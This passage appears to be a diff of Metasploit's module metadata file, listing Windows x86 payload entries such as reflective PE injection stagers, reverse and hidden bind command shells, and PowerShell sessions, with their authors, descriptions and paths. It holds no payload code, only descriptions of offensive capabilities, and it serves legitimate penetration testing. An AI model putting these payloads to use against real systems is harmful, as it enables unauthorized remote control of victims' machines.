imports, and TLS callbacks\nare not currently supported. 
Also PE files which use resource loading might crash.\nListen for a connection with UUID Support (Windows x86)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/peinject/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/bind_tcp_uuid" + }, + "payload_windows/peinject/find_tag": { + "name": "Windows Inject PE Files, Find Tag Ordinal Stager", + "fullname": "payload/windows/peinject/find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "skape " + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. 
Also PE files which use resource loading might crash.\nUse an established connection", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/findtag_ord.rb", + "is_install_path": true, + "ref_name": "windows/peinject/find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/findtag_ord" + }, + "payload_windows/peinject/reverse_ipv6_tcp": { + "name": "Windows Inject PE Files, Reverse TCP Stager (IPv6)", + "fullname": "payload/windows/peinject/reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "hdm ", + "skape ", + "sf " + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. 
Also PE files which use resource loading might crash.\nConnect back to the attacker over IPv6", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "windows/peinject/reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/reverse_ipv6_tcp" + }, + "payload_windows/peinject/reverse_named_pipe": { + "name": "Windows Inject PE Files, Windows x86 Reverse Named Pipe (SMB) Stager", + "fullname": "payload/windows/peinject/reverse_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "OJ Reeves" + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. 
Also PE files which use resource loading might crash.\nConnect back to the attacker via a named pipe pivot", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_named_pipe.rb", + "is_install_path": true, + "ref_name": "windows/peinject/reverse_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/reverse_named_pipe" + }, + "payload_windows/peinject/reverse_nonx_tcp": { + "name": "Windows Inject PE Files, Reverse TCP Stager (No NX or Win7)", + "fullname": "payload/windows/peinject/reverse_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "vlad902 " + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. 
Also PE files which use resource loading might crash.\nConnect back to the attacker (No NX)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb", + "is_install_path": true, + "ref_name": "windows/peinject/reverse_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/reverse_nonx_tcp" + }, + "payload_windows/peinject/reverse_ord_tcp": { + "name": "Windows Inject PE Files, Reverse Ordinal TCP Stager (No NX or Win7)", + "fullname": "payload/windows/peinject/reverse_ord_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "spoonm " + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. 
Also PE files which use resource loading might crash.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb", + "is_install_path": true, + "ref_name": "windows/peinject/reverse_ord_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/reverse_ord_tcp" + }, + "payload_windows/peinject/reverse_tcp": { + "name": "Windows Inject PE Files, Reverse TCP Stager", + "fullname": "payload/windows/peinject/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "hdm ", + "skape ", + "sf " + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. 
Also PE files which use resource loading might crash.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "windows/peinject/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/reverse_tcp" + }, + "payload_windows/peinject/reverse_tcp_allports": { + "name": "Windows Inject PE Files, Reverse All-Port TCP Stager", + "fullname": "payload/windows/peinject/reverse_tcp_allports", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "hdm ", + "skape ", + "sf " + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. 
Also PE files which use resource loading might crash.\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb", + "is_install_path": true, + "ref_name": "windows/peinject/reverse_tcp_allports", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/reverse_tcp_allports" + }, + "payload_windows/peinject/reverse_tcp_dns": { + "name": "Windows Inject PE Files, Reverse TCP Stager (DNS)", + "fullname": "payload/windows/peinject/reverse_tcp_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "hdm ", + "skape ", + "sf ", + "RageLtMan" + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. 
Also PE files which use resource loading might crash.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb", + "is_install_path": true, + "ref_name": "windows/peinject/reverse_tcp_dns", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/reverse_tcp_dns" + }, + "payload_windows/peinject/reverse_tcp_rc4": { + "name": "Windows Inject PE Files, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/windows/peinject/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "hdm ", + "skape ", + "sf ", + "mihi", + "RageLtMan" + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. 
Also PE files which use resource loading might crash.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb", + "is_install_path": true, + "ref_name": "windows/peinject/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/reverse_tcp_rc4" + }, + "payload_windows/peinject/reverse_tcp_rc4_dns": { + "name": "Windows Inject PE Files, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", + "fullname": "payload/windows/peinject/reverse_tcp_rc4_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "hdm ", + "skape ", + "sf ", + "mihi", + "RageLtMan" + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. 
Also PE files which use resource loading might crash.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", + "is_install_path": true, + "ref_name": "windows/peinject/reverse_tcp_rc4_dns", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/reverse_tcp_rc4_dns" + }, + "payload_windows/peinject/reverse_tcp_uuid": { + "name": "Windows Inject PE Files, Reverse TCP Stager with UUID Support", + "fullname": "payload/windows/peinject/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "hdm ", + "OJ Reeves" + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. 
Also PE files which use resource loading might crash.\nConnect back to the attacker with UUID Support", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/peinject/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/reverse_tcp_uuid" + }, + "payload_windows/pingback_bind_tcp": { + "name": "Windows x86 Pingback, Bind TCP Inline", + "fullname": "payload/windows/pingback_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7" + ], + "description": "Open a socket and report UUID when a connection is received (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/pingback_bind_tcp.rb", + "is_install_path": true, + "ref_name": "windows/pingback_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/pingback_reverse_tcp": { + "name": "Windows x86 Pingback, Reverse TCP Inline", + "fullname": "payload/windows/pingback_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7" + ], + "description": "Connect back to attacker and report UUID (Windows x86)", + "references": [], + 
"platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/pingback_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "windows/pingback_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/powershell_bind_tcp": { + "name": "Windows Interactive Powershell Session, Bind TCP", + "fullname": "payload/windows/powershell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ben Turner", + "Dave Hardy", + "vlad902 ", + "sf " + ], + "description": "Listen for a connection and spawn an interactive powershell session", + "references": [ + "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/powershell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "windows/powershell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/powershell_reverse_tcp": { + "name": "Windows Interactive Powershell Session, Reverse TCP", + "fullname": "payload/windows/powershell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ben Turner", + "Dave Hardy", + "vlad902 ", + "sf " + ], + "description": "Listen for a connection and spawn an interactive powershell session", + "references": [ + 
"URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/payloads/singles/windows/powershell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "windows/powershell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/powershell_reverse_tcp_ssl": { + "name": "Windows Interactive Powershell Session, Reverse TCP SSL", + "fullname": "payload/windows/powershell_reverse_tcp_ssl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ben Turner", + "Dave Hardy", + "vlad902 ", + "sf " + ], + "description": "Listen for a connection and spawn an interactive powershell session over SSL", + "references": [ + "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/payloads/singles/windows/powershell_reverse_tcp_ssl.rb", + "is_install_path": true, + "ref_name": "windows/powershell_reverse_tcp_ssl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/shell/bind_hidden_ipknock_tcp": { + "name": "Windows Command Shell, Hidden Bind Ipknock TCP Stager", + "fullname": "payload/windows/shell/bind_hidden_ipknock_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "spoonm ", + "sf ", + "hdm ", + "skape ", + "Borja Merino " + ], + 
"description": "Spawn a piped command shell (staged).\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode", + "references": [ + "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb", + "is_install_path": true, + "ref_name": "windows/shell/bind_hidden_ipknock_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/bind_hidden_ipknock_tcp" + }, + "payload_windows/shell/bind_hidden_tcp": { + "name": "Windows Command Shell, Hidden Bind TCP Stager", + "fullname": "payload/windows/shell/bind_hidden_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "spoonm ", + "sf ", + "hdm ", + "skape ", + "Borja Merino " + ], + "description": "Spawn a piped command shell (staged).\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", + "references": [ + "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb", + "is_install_path": true, + "ref_name": "windows/shell/bind_hidden_tcp", + "check": 
false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/bind_hidden_tcp" + }, + "payload_windows/shell/bind_ipv6_tcp": { + "name": "Windows Command Shell, Bind IPv6 TCP Stager (Windows x86)", + "fullname": "payload/windows/shell/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "spoonm ", + "sf ", + "hdm ", + "skape " + ], + "description": "Spawn a piped command shell (staged).\n\nListen for an IPv6 connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "windows/shell/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/bind_ipv6_tcp" + }, + "payload_windows/shell/bind_ipv6_tcp_uuid": { + "name": "Windows Command Shell, Bind IPv6 TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/windows/shell/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "spoonm ", + "sf ", + "hdm ", + "skape ", + "OJ Reeves" + ], + "description": "Spawn a piped command shell (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": 
"/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/shell/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/bind_ipv6_tcp_uuid" + }, + "payload_windows/shell/bind_named_pipe": { + "name": "Windows Command Shell, Windows x86 Bind Named Pipe Stager", + "fullname": "payload/windows/shell/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "spoonm ", + "sf ", + "UserExistsError" + ], + "description": "Spawn a piped command shell (staged).\n\nListen for a pipe connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb", + "is_install_path": true, + "ref_name": "windows/shell/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/bind_named_pipe" + }, + "payload_windows/shell/bind_nonx_tcp": { + "name": "Windows Command Shell, Bind TCP Stager (No NX or Win7)", + "fullname": "payload/windows/shell/bind_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "spoonm ", + "sf ", + "vlad902 " + ], + "description": "Spawn a piped command shell (staged).\n\nListen for a connection (No NX)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 
11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb", + "is_install_path": true, + "ref_name": "windows/shell/bind_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/bind_nonx_tcp" + }, + "payload_windows/shell/bind_tcp": { + "name": "Windows Command Shell, Bind TCP Stager (Windows x86)", + "fullname": "payload/windows/shell/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "spoonm ", + "sf ", + "hdm ", + "skape " + ], + "description": "Spawn a piped command shell (staged).\n\nListen for a connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_tcp.rb", + "is_install_path": true, + "ref_name": "windows/shell/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/bind_tcp" + }, + "payload_windows/shell/bind_tcp_rc4": { + "name": "Windows Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/windows/shell/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "spoonm ", + "sf ", + "hdm ", + "skape ", + "mihi", + "RageLtMan" + ], + "description": "Spawn a piped command shell (staged).\n\nListen for a connection", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": 
"2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb", + "is_install_path": true, + "ref_name": "windows/shell/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/bind_tcp_rc4" + }, + "payload_windows/shell/bind_tcp_uuid": { + "name": "Windows Command Shell, Bind TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/windows/shell/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "spoonm ", + "sf ", + "hdm ", + "OJ Reeves" + ], + "description": "Spawn a piped command shell (staged).\n\nListen for a connection with UUID Support (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/shell/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/bind_tcp_uuid" + }, + "payload_windows/shell/find_tag": { + "name": "Windows Command Shell, Find Tag Ordinal Stager", + "fullname": "payload/windows/shell/find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "spoonm ", + "sf ", + "skape " + ], + "description": "Spawn a piped command shell (staged).\n\nUse an established connection", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + 
"mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/findtag_ord.rb", + "is_install_path": true, + "ref_name": "windows/shell/find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/findtag_ord" + }, + "payload_windows/shell/reverse_ipv6_tcp": { + "name": "Windows Command Shell, Reverse TCP Stager (IPv6)", + "fullname": "payload/windows/shell/reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "spoonm ", + "sf ", + "hdm ", + "skape " + ], + "description": "Spawn a piped command shell (staged).\n\nConnect back to the attacker over IPv6", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "windows/shell/reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/reverse_ipv6_tcp" + }, + "payload_windows/shell/reverse_nonx_tcp": { + "name": "Windows Command Shell, Reverse TCP Stager (No NX or Win7)", + "fullname": "payload/windows/shell/reverse_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "spoonm ", + "sf ", + "vlad902 " + ], + "description": "Spawn a piped command shell (staged).\n\nConnect back to the attacker (No NX)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": 
